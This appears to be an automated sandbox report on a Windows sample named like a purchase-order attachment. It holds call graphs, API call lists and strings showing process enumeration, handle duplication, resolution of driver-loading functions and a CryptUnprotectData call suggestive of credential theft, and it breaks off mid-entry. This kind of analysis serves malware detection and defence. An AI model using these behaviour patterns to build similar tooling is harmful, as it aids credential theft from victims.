40108->40273 40111 43af2f 40301 4233c5 16 API calls 40111->40301 40339 432878 12 API calls 40113->40339 40114 43af51 40115 423426 11 API calls 40114->40115 40117 43af7d 40115->40117 40121 423426 11 API calls 40117->40121 40118 43b4f2 40346 43a76c 21 API calls 40118->40346 40119->40118 40345 42bbd5 memcpy memcpy memcpy memset memcpy 40119->40345 40124 43af94 40121->40124 40123 43b529 40347 44081d 163 API calls 40123->40347 40302 423330 11 API calls 40124->40302 40128 43b544 40133 43b55c 40128->40133 40348 42c02e memset 40128->40348 40129 43b428 40151 43b462 40129->40151 40340 432b60 16 API calls 40129->40340 40130 43afca 40303 423330 11 API calls 40130->40303 40131 43b47e 40132 43b497 40131->40132 40342 42374a memcpy memset memcpy memcpy memcpy 40131->40342 40343 4233ae 11 API calls 40132->40343 40349 43a87a 163 API calls 40133->40349 40138 43afdb 40304 4233ae 11 API calls 40138->40304 40140 43b4b1 40344 423399 11 API calls 40140->40344 40142 43b56c 40145 43b58a 40142->40145 40350 423330 11 API calls 40142->40350 40144 43afee 40305 44081d 163 API calls 40144->40305 40351 440f84 12 API calls 40145->40351 40147 43b4c1 40353 42db80 163 API calls 40147->40353 40150 43b592 40352 43a82f 16 API calls 40150->40352 40341 423330 11 API calls 40151->40341 40155 43b5b4 40354 438c4e 163 API calls 40155->40354 40157 43b5cf 40355 42c02e memset 40157->40355 40159 43b005 40159->40054 40164 43b01f 40159->40164 40306 42d836 163 API calls 40159->40306 40160 43b1ef 40316 4233c5 16 API calls 40160->40316 40162 43b212 40317 423330 11 API calls 40162->40317 40164->40160 40314 423330 11 API calls 40164->40314 40315 42d71d 163 API calls 40164->40315 40167 43b087 40307 4233ae 11 API calls 40167->40307 40169 43add4 40169->40108 40356 438f86 16 API calls 40169->40356 40170 43b22a 40318 42ccb5 11 API calls 40170->40318 40173 43b23f 40319 4233ae 11 API calls 40173->40319 40174 43b10f 40310 423330 11 API calls 40174->40310 40176 43b257 40320 4233ae 11 API calls 40176->40320 40180 43b129 40311 4233ae 11 API calls 40180->40311 40181 43b26e 40321 4233ae 11 API calls 40181->40321 40182 43b09a 40182->40174 40308 42cc15 19 API calls 40182->40308 40309 4233ae 11 API calls 40182->40309 40186 43b282 40322 43a87a 163 API calls 40186->40322 40187 43b13c 40312 440f84 12 API calls 40187->40312 40189 43b29d 40323 423330 11 API calls 40189->40323 40192 43b15f 40313 4233ae 11 API calls 40192->40313 40193 43b2af 40195 43b2b8 40193->40195 40196 43b2ce 40193->40196 40324 4233ae 11 API calls 40195->40324 40325 440f84 12 API calls 40196->40325 40199 43b2c9 40327 4233ae 11 API calls 40199->40327 40200 43b2da 40326 42370b memset memcpy memset 40200->40326 40203 43b2f9 40328 423330 11 API calls 40203->40328 40205 43b30b 40329 423330 11 API calls 40205->40329 40207 43b325 40330 423399 11 API calls 40207->40330 40209 43b332 40331 4233ae 11 API calls 40209->40331 40211 43b354 40332 423399 11 API calls 40211->40332 40213 43b364 40333 43a82f 16 API calls 40213->40333 40215 43b370 40334 42db80 163 API calls 40215->40334 40217 43b380 40335 438c4e 163 API calls 40217->40335 40219 43b39e 40336 423399 11 API calls 40219->40336 40221 43b3ae 40337 43a76c 21 API calls 40221->40337 40223 43b3c3 40338 423399 11 API calls 40223->40338 40225->40046 40226->40049 40227->40047 40229 43a6f5 40228->40229 40230 43a765 40228->40230 40229->40230 40357 42a115 40229->40357 40230->40054 40236 4397fd 40230->40236 40234 43a73d 40234->40230 40235 42a115 147 API calls 40234->40235 40235->40230 40237 43980c 40236->40237 40238 439804 40236->40238 40237->40054 40237->40062 40237->40078 40554 42324c memset 40238->40554 40241 42343a 40240->40241 40243 42344c 40240->40243 40555 415bbe 11 API calls 40241->40555 40243->40076 40245 439828 40244->40245 40272 439952 40244->40272 40246 4397fd memset 40245->40246 40245->40272 40247 43984c 40246->40247 40248 4398b0 40247->40248 40249 43986b 40247->40249 40247->40272 40558 42d71d 163 API calls 40248->40558 40556 4233ae 11 API calls 40249->40556 40252 4398bd 40559 423399 11 API calls 40252->40559 40253 43987a 40255 439892 40253->40255 40557 423330 11 API calls 40253->40557 40255->40272 40561 42d71d 163 API calls 40255->40561 40256 4398c8 40560 4233ae 11 API calls 40256->40560 40260 4398f5 40562 423399 11 API calls 40260->40562 40262 439902 40563 423399 11 API calls 40262->40563 40264 43990c 40564 423330 11 API calls 40264->40564 40266 43991c 40565 423330 11 API calls 40266->40565 40268 439936 40566 423399 11 API calls 40268->40566 40270 439942 40567 423330 11 API calls 40270->40567 40272->40080 40274 4393c7 40273->40274 40275 4394db 40273->40275 40274->40275 40568 423c8d 40274->40568 40275->40054 40277 4394d0 40575 439351 15 API calls 40277->40575 40281 4393fd 40281->40277 40282 4165ff 11 API calls 40281->40282 40573 415be9 memcpy 40281->40573 40574 423ce4 15 API calls 40281->40574 40282->40281 40283->40056 40284->40054 40285->40078 40286->40067 40287->40071 40288->40068 40289->40072 40290->40082 40291->40085 40292->40093 40293->40091 40294->40097 40295->40169 40296->40095 40297->40100 40298->40101 40299->40101 40300->40111 40301->40114 40302->40130 40303->40138 40304->40144 40305->40159 40306->40167 40307->40182 40308->40182 40309->40182 40310->40180 40311->40187 40312->40192 40313->40164 40314->40164 40315->40164 40316->40162 40317->40170 40318->40173 40319->40176 40320->40181 40321->40186 40322->40189 40323->40193 40324->40199 40325->40200 40326->40199 40327->40203 40328->40205 40329->40207 40330->40209 40331->40211 40332->40213 40333->40215 40334->40217 40335->40219 40336->40221 40337->40223 40338->40169 40339->40129 40340->40151 40341->40131 40342->40132 40343->40140 40344->40147 40345->40118 40346->40123 40347->40128 40348->40133 40349->40142 40350->40145 40351->40150 40352->40147 40353->40155 40354->40157 40355->40169 40356->40108 40358 42a175 40357->40358 40360 42a122 40357->40360 40358->40230 40363 42b13b 147 API calls 40358->40363 40360->40358 40361 42a115 147 API calls 40360->40361 40364 43a174 40360->40364 40388 42a0a8 147 API calls 40360->40388 40361->40360 40363->40234 40378 43a196 40364->40378 40379 43a19e 40364->40379 40365 43a306 40365->40378 40404 4388c4 14 API calls 40365->40404 40368 42a115 147 API calls 40368->40379 40369 415a91 memset 40369->40379 40370 43a642 40370->40378 40408 4169a7 11 API calls 40370->40408 40374 43a635 40407 42c02e memset 40374->40407 40378->40360 40379->40365 40379->40368 40379->40369 40379->40378 40389 42ff8c 40379->40389 40397 4165ff 40379->40397 40400 439504 13 API calls 40379->40400 40401 4312d0 147 API calls 40379->40401 40402 42be4c memcpy memcpy memcpy memset memcpy 40379->40402 40403 43a121 11 API calls 40379->40403 40381 4169a7 11 API calls 40382 43a325 40381->40382 40382->40370 40382->40374 40382->40378 40382->40381 40383 42b5b5 memset memcpy 40382->40383 40384 42bf4c 14 API calls 40382->40384 40387 4165ff 11 API calls 40382->40387 40405 42b63e 14 API calls 40382->40405 40406 42bfcf memcpy 40382->40406 40383->40382 40384->40382 40387->40382 40388->40360 40409 43817e 40389->40409 40391 42ff99 40392 42ffe3 40391->40392 40393 42ffd0 40391->40393 40396 42ff9d 40391->40396 40414 4169a7 11 API calls 40392->40414 40413 4169a7 11 API calls 40393->40413 40396->40379 40398 4165a0 11 API calls 40397->40398 40399 41660d 40398->40399 40399->40379 40400->40379 40401->40379 40402->40379 40403->40379 40404->40382 40405->40382 40406->40382 40407->40370 40408->40378 40410 438187 40409->40410 40412 438192 40409->40412 40415 4380f6 40410->40415 40412->40391 40413->40396 40414->40396 40417 43811f 40415->40417 40416 438164 40416->40412 40417->40416 40419 4300e8 3 API calls 40417->40419 40420 437e5e 40417->40420 40419->40417 40443 437d3c 40420->40443 40422 437eb3 40422->40417 40423 437ea9 40423->40422 40428 437f22 40423->40428 40458 41f432 40423->40458 40426 437f06 40505 415c56 11 API calls 40426->40505 40430 437f7f 40428->40430 40431 432d4e 3 API calls 40428->40431 40429 437f95 40506 415c56 11 API calls 40429->40506 40430->40429 40433 43802b 40430->40433 40431->40430 40434 4165ff 11 API calls 40433->40434 40435 438054 40434->40435 40469 437371 40435->40469 40438 43806b 40439 438094 40438->40439 40507 42f50e 138 API calls 40438->40507 40441 437fa3 40439->40441 40442 4300e8 3 API calls 40439->40442 40441->40422 40508 41f638 104 API calls 40441->40508 40442->40441 40444 437d69 40443->40444 40447 437d80 40443->40447 40509 437ccb 11 API calls 40444->40509 40446 437d76 40446->40423 40447->40446 40448 437da3 40447->40448 40450 437d90 40447->40450 40451 438460 134 API calls 40448->40451 40450->40446 40513 437ccb 11 API calls 40450->40513 40454 437dcb 40451->40454 40453 437de8 40512 424f26 123 API calls 40453->40512 40454->40453 40510 444283 13 API calls 40454->40510 40456 437dfc 40511 437ccb 11 API calls 40456->40511 40459 41f54d 40458->40459 40465 41f44f 40458->40465 40460 41f466 40459->40460 40543 41c635 memset memset 40459->40543 40460->40426 40460->40428 40465->40460 40467 41f50b 40465->40467 40514 41f1a5 40465->40514 40539 41c06f memcmp 40465->40539 40540 41f3b1 90 API calls 40465->40540 40541 41f398 86 API calls 40465->40541 40467->40459 40467->40460 40542 41c295 86 API calls 40467->40542 40470 41703f 11 API calls 40469->40470 40471 437399 40470->40471 40472 43739d 40471->40472 40475 4373ac 40471->40475 40544 4446ea 11 API calls 40472->40544 40474 4373a7 40474->40438 40476 416935 16 API calls 40475->40476 40477 4373ca 40476->40477 40479 438460 134 API calls 40477->40479 40483 4251c4 137 API calls 40477->40483 40487 415a91 memset 40477->40487 40490 43758f 40477->40490 40502 437584 40477->40502 40504 437d3c 135 API calls 40477->40504 40545 425433 13 API calls 40477->40545 40546 425413 17 API calls 40477->40546 40547 42533e 16 API calls 40477->40547 40548 42538f 16 API calls 40477->40548 40549 42453e 123 API calls 40477->40549 40478 4375bc 40481 415c7d 16 API calls 40478->40481 40479->40477 40482 4375d2 40481->40482 40482->40474 40484 4442e6 11 API calls 40482->40484 40483->40477 40485 4375e2 40484->40485 40485->40474 40552 444283 13 API calls 40485->40552 40487->40477 40550 42453e 123 API calls 40490->40550 40491 4375f4 40496 437620 40491->40496 40497 43760b 40491->40497 40495 43759f 40498 416935 16 API calls 40495->40498 40500 416935 16 API calls 40496->40500 40553 444283 13 API calls 40497->40553 40498->40502 40500->40474 40502->40478 40551 42453e 123 API calls 40502->40551 40503 437612 memcpy 40503->40474 40504->40477 40505->40422 40506->40441 40507->40439 40508->40422 40509->40446 40510->40456 40511->40453 40512->40446 40513->40446 40515 41bc3b 101 API calls 40514->40515 40516 41f1b4 40515->40516 40517 41edad 86 API calls 40516->40517 40524 41f282 40516->40524 40518 41f1cb 40517->40518 40519 41f1f5 memcmp 40518->40519 40520 41f20e 40518->40520 40518->40524 40519->40520 40521 41f21b memcmp 40520->40521 40520->40524 40522 41f326 40521->40522 40525 41f23d 40521->40525 40523 41ee6b 86 API calls 40522->40523 40522->40524 40523->40524 40524->40465 40525->40522 40526 41f28e memcmp 40525->40526 40528 41c8df 56 API calls 40525->40528 40526->40522 40527 41f2a9 40526->40527 40527->40522 40530 41f308 40527->40530 40531 41f2d8 40527->40531 40529 41f269 40528->40529 40529->40522 40532 41f287 40529->40532 40533 41f27a 40529->40533 40530->40522 40537 4446ce 11 API calls 40530->40537 40534 41ee6b 86 API calls 40531->40534 40532->40526 40535 41ee6b 86 API calls 40533->40535 40536 41f2e0 40534->40536 40535->40524 40538 41b1ca memset 40536->40538 40537->40522 40538->40524 40539->40465 40540->40465 40541->40465 40542->40459 40543->40460 40544->40474 40545->40477 40546->40477 40547->40477 40548->40477 40549->40477 40550->40495 40551->40478 40552->40491 40553->40503 40554->40237 40555->40243 40556->40253 40557->40255 40558->40252 40559->40256 40560->40255 40561->40260 40562->40262 40563->40264 40564->40266 40565->40268 40566->40270 40567->40272 40576 4238ad memset memcpy 40568->40576 40570 423ca5 40571 415a91 memset 40570->40571 40572 423cc3 40571->40572 40572->40281 40573->40281 40574->40281 40575->40275 40576->40570 40577 441819 40580 430737 40577->40580 40579 441825 40579->40579 40581 430756 40580->40581 40593 43076d 40580->40593 40582 430774 40581->40582 40583 43075f 40581->40583 40595 43034a memcpy 40582->40595 40594 4169a7 11 API calls 40583->40594 40586 4307ce 40588 430819 memset 40586->40588 40596 415b2c 11 API calls 40586->40596 40587 43077e 40587->40586 40591 4307fa 40587->40591 40587->40593 40588->40593 40590 4307e9 40590->40588 40590->40593 40597 4169a7 11 API calls 40591->40597 40593->40579 40594->40593 40595->40587 40596->40590 40597->40593 40598 41493c EnumResourceNamesW

                                        Executed Functions

                                        Function 0040DD85 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 212filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                        APIs
                                        • memset.MSVCRT ref: 0040DDAD
                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                          • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                        • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                        • _wcsicmp.MSVCRT ref: 0040DEB2
                                        • _wcsicmp.MSVCRT ref: 0040DEC5
                                        • _wcsicmp.MSVCRT ref: 0040DED8
                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                        • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                        • memset.MSVCRT ref: 0040DF5F
                                        • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                        • _wcsicmp.MSVCRT ref: 0040DFB2
                                        • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                        • String ID: dllhost.exe$p+Fw@FFw@BFw$taskhost.exe$taskhostex.exe
                                        • API String ID: 708747863-4209158791
                                        • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                        • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                        • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                        • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                        Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 649 413e79-413e9d call 413959 call 413ca4 642->649 650 413e28-413e35 642->650 646 413ec8-413eda call 4099f4 643->646 647 413ebf-413ec6 free 643->647 651 413edb-413ee2 646->651 647->651 662 413ea2-413eae CloseHandle 649->662 653 413e61-413e68 650->653 654 413e37-413e44 GetModuleHandleW 650->654 655 413ee4 651->655 656 413ee7-413efe 651->656 653->649 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->649 662->641
                                        APIs
                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                        • memset.MSVCRT ref: 00413D7F
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                        • memset.MSVCRT ref: 00413E07
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                        • free.MSVCRT ref: 00413EC1
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                        • API String ID: 1344430650-1740548384
                                        • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                        • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                        • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                        • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                        Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                        • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                        • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                        • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                        • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                        • String ID: AE$BIN
                                        • API String ID: 1668488027-3931574542
                                        • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                        • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                        • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                        • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                        Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                          • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                          • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                        • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                        • free.MSVCRT ref: 00418803
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                        • String ID:
                                        • API String ID: 1355100292-0
                                        • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                        • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                        • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                        • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                        Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                        • String ID:
                                        • API String ID: 767404330-0
                                        • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                        • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                        • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                        • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                        Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                        • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileFind$FirstNext
                                        • String ID:
                                        • API String ID: 1690352074-0
                                        • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                        • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                        • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                        • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                        Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0041898C
